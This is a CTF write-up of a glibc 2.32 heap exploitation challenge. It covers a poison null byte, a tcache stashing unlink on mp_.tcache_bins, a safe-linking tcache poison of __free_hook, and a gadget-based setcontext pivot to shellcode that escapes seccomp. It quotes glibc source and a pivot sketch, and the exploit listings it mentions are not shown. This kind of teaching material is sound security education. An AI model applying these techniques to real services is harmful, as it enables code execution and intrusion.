A few weeks ago, I played with DiceGang in ASIS Finals CTF. Yet Another House was one of the heap pwnables, and it had only one solve (which was by us). The general gist of it involved performing a glibc 2.32 poison null byte attack without a heap leak, a tcache stashing unlink attack to overwrite mp_.tcache_bins, and a tcache poison for a controlled arbitrary write to escape seccomp and read the flag. I didn't originally plan on writing this up, but when redoing this complex pwnable a few weeks later, I thought it would be good to take some detailed notes so I don't forget these techniques.
Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop.
Initial Work:
One thing to note immediately is the patch the author introduced into the glibc library: a hook on malloc that memsets the first 0x280 bytes of the tcache_perthread_struct (the entire default struct) on every allocation.
By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against the poison null byte where it checks a chunk's size field against the next chunk's prev_size field and ensures that they match before back coalescing. However, this time, we cannot just forge headers easily via a heap leak like in Player2 to beat the unlink check. We will have to rely on the fact that glibc doesn't zero out the pointers left behind by heap operations involving the unsorted and large bins (each uniquely sized chunk in a largebin has 2 sets of pointers, the bottom two being fd_nextsize and bk_nextsize to help maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers, which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques, 2.29 off by null bypass (as with many pwnable topics, Chinese CTF players often document some of the coolest and most obscure techniques, and Google Translate should suffice).
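For reference, the checks we are up against look roughly like this in glibc 2.32 (reproduced from memory and lightly abridged, so treat it as a sketch of malloc.c rather than the exact source):

    /* _int_free, backward consolidation path */
    if (!prev_inuse(p)) {
        prevsize = prev_size (p);
        size += prevsize;
        p = chunk_at_offset(p, -((long) prevsize));
        if (__glibc_unlikely (chunksize(p) != prevsize))
          malloc_printerr ("corrupted size vs. prev_size while consolidating");
        unlink_chunk (av, p);
    }

    /* unlink_chunk itself */
    static void
    unlink_chunk (mstate av, mchunkptr p)
    {
      if (chunksize (p) != prev_size (next_chunk (p)))
        malloc_printerr ("corrupted size vs. prev_size");

      mchunkptr fd = p->fd;
      mchunkptr bk = p->bk;

      if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
        malloc_printerr ("corrupted double-linked list");

      fd->bk = bk;
      bk->fd = fd;
      if (!in_smallbin_range (chunksize (p)) && p->fd_nextsize != NULL)
        {
          /* additional fd_nextsize/bk_nextsize consistency checks and relinking */
        }
    }

In other words, the forged chunk needs a believable size/prev_size pair plus fd/bk pointers that point back to it, and its fd_nextsize should either be NULL or form a consistent nextsize chain.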
An interesting thing to note is that in 2.32, the tcache_perthread_struct no longer uses uint8_t to store tcache counts; it now uses uint16_t. Hence, if we can place chunks of sizes around 0x1420 and above into the tcache, their count (and their entry pointer) will sit beyond the range the memset wipes. Some of you may recall that the tcache count did not matter before as long as you had a pointer in the tcache_perthread_struct (as I believe those count checks were once asserts in tcache_get that got compiled out for release builds), but now there are sanity checks against such behavior; this is why we need to allocate our tcache candidates from a bin whose count lies outside the memset range.
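For context, this is roughly what the relevant tcache structures look like in 2.32 (abridged from malloc.c from memory, with TCACHE_MAX_BINS at its default of 64); note that 64 * 2 + 64 * 8 = 0x280, which is exactly the size of the region the patched malloc wipes:

    typedef struct tcache_entry
    {
      struct tcache_entry *next;
      /* This field exists to detect double frees.  */
      struct tcache_perthread_struct *key;
    } tcache_entry;

    typedef struct tcache_perthread_struct
    {
      uint16_t counts[TCACHE_MAX_BINS];        /* 64 * 2 = 0x80 bytes  */
      tcache_entry *entries[TCACHE_MAX_BINS];  /* 64 * 8 = 0x200 bytes */
    } tcache_perthread_struct;

    /* __libc_malloc: the count itself (not just the pointer) now gates the
       tcache fast path, so a stale entry with a zeroed count is useless.  */
    if (tc_idx < mp_.tcache_bins
        && tcache
        && tcache->counts[tc_idx] > 0)
      return tcache_get (tc_idx);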
In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.
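For reference, mp_ is an instance of the following struct (abridged from malloc.c; the tcache fields only exist when tcache support is compiled in):

    struct malloc_par
    {
      /* Tunable parameters */
      unsigned long trim_threshold;
      INTERNAL_SIZE_T top_pad;
      INTERNAL_SIZE_T mmap_threshold;
      INTERNAL_SIZE_T arena_test;
      INTERNAL_SIZE_T arena_max;

      /* Memory map support */
      int n_mmaps;
      int n_mmaps_max;
      int max_n_mmaps;
      int no_dyn_threshold;

      /* Statistics */
      INTERNAL_SIZE_T mmapped_mem;
      INTERNAL_SIZE_T max_mmapped_mem;

      char *sbrk_base;

    #if USE_TCACHE
      /* Maximum number of buckets to use.  */
      size_t tcache_bins;
      size_t tcache_max_bytes;
      /* Maximum number of chunks in each bucket.  */
      size_t tcache_count;
      size_t tcache_unsorted_limit;
    #endif
    };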
By overwriting that with a large value (such as a libc address), we can place larger chunks into the tcache and bypass the wipe.
Normally, this type of write makes me think of an unsorted bin or largebin attack. However, since 2.28, the unsorted bin attack has been patched with a bck->fd != victim check, and in 2.30, the largebin attack was hardened as well, though how2heap still shows a potential way to perform it (I took a closer look at the newer version of this attack after the CTF; while I did not end up testing whether it would actually work in this challenge, it could potentially have offered a much easier alternative with a simpler setup). Another way to achieve this write in glibc 2.32 is to perform what is known as the tcache stashing unlink attack, which I learned about from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.
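For completeness, the reason the classic unsorted bin attack dies is this check when a chunk is removed from the unsorted list (roughly, from memory, in _int_malloc):

    bck = victim->bk;
    /* ... */
    /* remove from unsorted list */
    if (__glibc_unlikely (bck->fd != victim))
      malloc_printerr ("malloc(): corrupted unsorted chunks 3");
    unsorted_chunks (av)->bk = bck;
    bck->fd = unsorted_chunks (av);

Since bck->fd must already equal victim before the write happens, pointing bk at an arbitrary target no longer works.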
The relevant source for this attack is here:
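(Reproduced from memory from the smallbin path of _int_malloc in glibc 2.32 and lightly abridged:)

    #if USE_TCACHE
      /* While we're here, if we see other chunks of the same size,
         stash them in the tcache.  */
      size_t tc_idx = csize2tidx (nb);
      if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks over.  */
          while (tcache->counts[tc_idx] < mp_.tcache_count
                 && (tc_victim = last (bin)) != bin)
            {
              if (tc_victim != 0)
                {
                  bck = tc_victim->bk;
                  set_inuse_bit_at_offset (tc_victim, nb);
                  if (av != &main_arena)
                    set_non_main_arena (tc_victim);
                  bin->bk = bck;
                  bck->fd = bin;

                  tcache_put (tc_victim, tc_idx);
                }
            }
        }
    #endif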
Basically, when we have chunks inside a specific smallbin, causing malloc to pull from that smallbin triggers a transfer of the remaining chunks into the respective tcache bin afterwards. Notice the bck = tc_victim->bk and bck->fd = bin lines during the stashing process. By corrupting the bk pointer of a smallbin chunk, we can write a libc address (the address of the bin) into a chosen address + 0x10. We must take care to do this only on the chunk that is one slot away from filling the tcache, so the stashing loop ends immediately afterwards and never walks the corrupted chain any further. Most writeups start with 6 chunks in the tcache bin and 2 in the smallbin, so you can pull out one smallbin chunk, corrupt the bk of the last one (smallbins are FIFO, with chunks removed from the tail), trigger the stash, and have it end immediately as the tcache becomes full. However, in this case, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin: 1 to pull out, 6 to stash, and a final one to stash and perform the write. Regardless of what happens, this smallbin ends up corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ variants of this attack to get an arbitrary address allocation, or an arbitrary address allocation plus a write of a libc address somewhere in memory.
One more new protective feature in libc 2.32 is pointer obfuscation/safe linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup, where (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer) for singly linked lists. Once we achieve a heap leak, this protection mechanism is trivial to beat, and the new aligned address check for these lists won't matter as we will be targeting __free_hook.
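The relevant macros from malloc.c are roughly:

    /* Safe-linking: the stored next pointer is the real pointer xor'd with
       the address of the pointer's own storage location shifted right by 12.  */
    #define PROTECT_PTR(pos, ptr) \
      ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
    #define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

So to poison a tcache next pointer stored at address addr, we write target ^ (addr >> 12); with a heap leak, addr >> 12 is known.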
Lastly, since this writeup requires a lot of heap massaging involving smallbins and largebins, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out too bad when writing this exploit, as a lot of it just relied on intuition and checking in a debugger.
Exploit Development:
I recommend following along closely with a debugger, as my explanations might be wrong in places or I might have misexplained a small step due to the complexity of this exploit.
To start off, I wrote some helper functions:
Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.
Several chunks are allocated, and then three chunks of different sizes (but belonging to the same largebin) are freed into the unsorted bin. A chunk larger than all three is then requested, causing a new chunk to be pulled from the wilderness and the 3 unsorted chunks to be sorted into the same largebin in order, with 2 sets of pointers filled for each since they have unique sizes. Notice how the middle-sized one has its first set of pointers aligned at an address ending in a null byte; this is purposeful, as we will later forge a fake size header over the first set of pointers here, and we can perform partial overwrites on other chunks with dangling pointers using just the single null byte from the alloc function to align everything and pass the unlink check.
Note that I didn't fill the middle chunk with as many characters, since I will soon forge a fake chunk header there; it will be the target to back coalesce onto. Because the back coalesce region will be quite large, I have to leave the part after the pointers as null bytes (or at least the qword immediately afterwards), since glibc's unlink performs additional operations when the chunk being unlinked is of large size and has a non-null fd_nextsize pointer.
Next, Asphyxia freed the chunk before the middle largebin chunk, causing it to back coalesce (while also leaving the 2 sets of pointers behind for me to use) and go into the unsorted bin. Another allocation is made so that the first set of leftover pointers can be used to fake a chunk header, and the next set can be used as part of the setup to beat the unlink checks (I chose a fake chunk size of 0x2150).
Then we cleared out the unsorted bin and recovered the other two largebin chunks, to then build an unsorted bin chain. The order of freeing matters here for unsorted bins. We want the chunk underneath the fake headers to be in the middle, so that its address in the unsorted chain can be changed to point to the fake chunk with just a null byte overwrite (as they are all in the 0x......7XX range).
Now we want to recover the 0x440 chunk from the unsorted bin and write a single null byte there to satisfy the fd->bk == P check. We want to do the same thing with the 0x460 chunk; to preserve its pointers, we back coalesce it with a chunk before it. Then an allocation can be made to place a null byte that changes the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also get some heap pointers written into these two chunks for a heap leak due to how unlink works. Notice how the forged chunk now has the perfect pointer chain to pass the unlink check.
Afterwards, I cleaned up the remaining largebin and unsorted bin, and performed a few more allocations just to expand the number of chunks that would be overlapped. I then allocated a few more chunks of size 0x110 (which I will use later for the tcache stashing unlink attack), with some additional fake chunk metadata that will let me free a fake 0x1510 chunk later, which I plan to use for the tcache poison. My final 0x110 chunk is meant only to prevent consolidation later, depending on the order in which I build my smallbin chain; I cannot actually use it, as this extra spot is crucial for the later massage.
I triggered the poison null byte after setting the correct prev_size metadata and created a massive unsorted bin that overlapped a lot of memory after I freed the poisoned chunk.
Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.
Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.
Since the libc address for the unsorted bin starts with a null byte, I had to find a way to get a largebin pointer allocated at the beginning of my chunk data for the libc leak. I achieved this by first aligning the unsorted bin with one of my chunk data addresses, then allocating a very large chunk (greater than the remaining unsorted size) to trigger largebin activity, hence providing me with a libc leak. Two operations were also performed to fix some of the chunks' size metadata that got corrupted and overwritten during these heap manipulations (though they turned out to be unnecessary, as I had to change all of them in the next stage of the exploit). Lastly, I allocated another 0x110 chunk into index 10, and used that as an opportunity to fix index 8's chunk size to something valid that free() will accept.
A general technique I used above and one that I will use from now on to fake sizes or forge metadata is one where I allocate one to two massive chunks from the unsorted bin to reach the specified destination, write the data upon allocation, and then free it in the opposite order of allocation to back coalesce it and restore the state of the unsorted bin.
In order to perform a tcache stashing attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need 15 chunks of size 0x110 to free. The first 7 can be freed into the tcache, and the next 8 will be freed into the unsorted bin (where we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into the smallbin, and have the chunk inserted into the 0x110 smallbin last be overlapped so its bk pointer can be tampered with; this way we can still perform the stash attack without crashing and have the final chunk entering the tcache perform the write. At the current stage, we only have 0x110 chunks at indices 12, 13, 14, 15, 16, 17, 2, 4, 7, 10, and we will need 5 more. Here is the program chunk array as of now:
The ones marked with X are the 0x110 chunks (or at least should have that as the size and I have to repair them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I plan on saving one for the tcache poison, one for the smallbin bk pointer corruption, and just one extra for backup/padding purposes (in the end, I didn't even need it); these were index 1, 6, and 9.
To free up the other chunks, I performed the technique mentioned above (allocate one to two chunks, write the correct size or just spam with 0x21 sizes, and recoalesce back to restore unsorted chunk) on chunks 3 and 5 to make them isolated 0x20 sized chunks (size for index 8 has already been changed in the last 0x110 allocation), on chunk 9 to make it into size 0x1510, and applied it one last time to fix some of the 0x110 chunk size metadata that I may have overwritten. Chunk 11 can be freed before all of these operations by just having it back coalesce into the large unsorted bin. I will also free 0, which will add one more unsorted chunk into the unsorted bin, but luckily it didn't raise any new issues I had to deal with in the heap massage later. We should have 6 free spots at this point; 5 for additional 0x110 chunks and one for padding/alignment purposes to create an overlap.
Now, I added 5 more 0x110 chunks. This cannot be done directly. Rather, I performed the allocations (and some frees) in such a way that the unsorted chunk created by freeing chunk 0 runs out after three 0x110 allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extended into index 6 chunk's data (which we control), and allocated a 0x110 chunk from there (providing us with an overlap over a potential smallbin chunk). Since this last chunk will go into the unsorted bin before reaching the smallbin, I had to ensure it would not coalesce with the neighboring unsorted chunk, so I freed a previous 0x110 chunk and allocated one more from the unsorted bin to act as a guard chunk; the nice thing about the tcache memset is that I can free smaller chunks like these to help with the heap massage without worrying about them coming back.
One thing to note is the reason for which I chose index 6 to be the one to overlap and overwrite the last smallbin bk. I mentioned it above in the code comments, but it's because there was a 0x110 chunk after it and it was also the first of the three chunks I kept in memory.
At this stage, we have 15 chunks of size 0x110: indices 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18. To avoid any coalescing and keep this number of chunks for the tcache and smallbin frees, I closely considered the following rules (which you can verify by debugging):
1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)
2. 12 will back coalesce into the large unsorted if not entered into tcache.
3. 0, 3 is a chain
4. 8, 10 is a chain
5. 5 is on top of the big unsorted chunk
6. 2, 4 are isolated
7. 7 has the potential to go into unsorted and merge with a smallbin
8. 18 must be the last one into the smallbin
Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer to smallbin of the 8 unsorted 0x110 chunks and freed this larger chunk to restore the large unsorted bin's state.
Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.
Since we don't have edit available anymore, I had to free index 6 into the unsorted bin and then allocate to get it back, using that write to perform the overwrite over the index 18 0x110 smallbin chunk so that the stash writes a libc address into mp_.tcache_bins. Making another request into the smallbin then triggers the stash. The 0x110 smallbin is corrupted afterwards, so avoid allocating from it again.
Between indices 1 and 9, I chose to use 9 for my tcache poison. To set this up, I first allocated a large enough chunk to make the unsorted bin small enough so that when I ask for a 0x1510 allocation, it pulls from the wilderness. I then freed this new chunk, and then index 9 (which had its size overwritten with 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280 byte memset hooked onto malloc.
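A quick sanity check of the arithmetic (my own calculation using the standard csize2tidx macro, not anything from the challenge code):

    #define MALLOC_ALIGNMENT 0x10UL
    #define MINSIZE          0x20UL
    #define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)

    /* csize2tidx(0x1510) == 0x14f (335).
       counts[335]  is at offset 2 * 335        = 0x29e  -> past the 0x280 memset
       entries[335] is at offset 0x80 + 8 * 335 = 0xaf8  -> also untouched
       So both the count and the poisoned next pointer survive the wipe.  */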
Then, I pulled a chunk from the large unsorted chunk to overlap what was index 9, and, following the pointer obfuscation rules, changed its stored next pointer to __free_hook.
Now, we must decide how to escape the seccomp filter. Of course, we will need an open/read/write ROP chain, but how can we pivot with only control over __free_hook (which gives us control over rdi)?
One idea we had was setcontext, a well-known function to use as a stack pivot.
However, starting around libc 2.29, it relies on rdx instead of rdi, and we do not have control over rdx. After some attempts at FSOP and forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget (which exists in many newer glibc versions) that allows us to load rdx from rdi and then call an address relative to rdx. In this libc, it was the following:
    mov  rdx, qword ptr [rdi + 8]
    mov  qword ptr [rsp], rax
    call qword ptr [rdx + 0x20]
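As a very rough sketch of how the pivot fits together: the helper name and the setcontext offsets below (0xa0 for the new rsp, 0xa8 for the value that gets loaded into rcx, pushed, and later returned to) are assumptions based on a typical 2.29+ setcontext and should be verified against the target libc; this is an illustration, not the actual exploit code.

    #include <stdint.h>
    #include <string.h>

    /* Hypothetical helper: lay out the chunk that will be passed to free()
       once __free_hook points at the COP gadget (so rdi = chunk).  */
    static void build_pivot_chunk(uint8_t *chunk, uint64_t chunk_addr,
                                  uint64_t setcontext_addr,
                                  uint64_t new_rsp, uint64_t new_rip)
    {
        memset(chunk, 0, 0x100);
        memcpy(chunk + 0x08, &chunk_addr,      8); /* gadget: rdx = [rdi + 8]        */
        memcpy(chunk + 0x20, &setcontext_addr, 8); /* gadget: call [rdx + 0x20]      */
        memcpy(chunk + 0xa0, &new_rsp,         8); /* setcontext: rsp = [rdx + 0xa0] */
        memcpy(chunk + 0xa8, &new_rip,         8); /* setcontext: rcx = [rdx + 0xa8],
                                                      pushed and later ret'd to      */
    }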
This gadget makes it relatively trivial, as we can just set up the heap for the ROP (taking care of the one push rcx instruction setcontext performs). I went for an mprotect to change the heap to rwx, and then pivoted to shellcode on the heap to open, read, write, and exit. Due to my earlier spamming of 0x21 size metadata, I was not able to allocate again from some of the larger chunks, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:
Final Exploit:
Do note that in this writeup, I nop'd out the sleep for the sake of local testing. However, running it against the provided ynetd binary (as the CTF server is no longer up) with a 3 second timeout added onto each option in my script still finished more than 10 minutes under the sigalarm limit, so it should have been fine in the actual competition scenario.
Concluding Thoughts:
While this challenge was overall pretty decent, as it showed some up-to-date glibc tricks, I felt that some of its elements were unnecessary and added artificial difficulty. It could have been just as difficult conceptually if it had allowed 2-3 more allocation spots (rather than forcing players with the correct plan to rewrite their exploit several times), and combining a sigalarm with a 2 second sleep in the main menu didn't add any value. Additionally, while the custom patch made to this libc makes sense and did contribute to the overall quality, I have been seeing libc patching happen more often and hope CTF authors do not abuse it to create extremely contrived heap note problems.
Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex). Congrats to Poortho for taking first blood, and thanks again to all the teammates who worked with me in DiceGang, which placed 4th overall!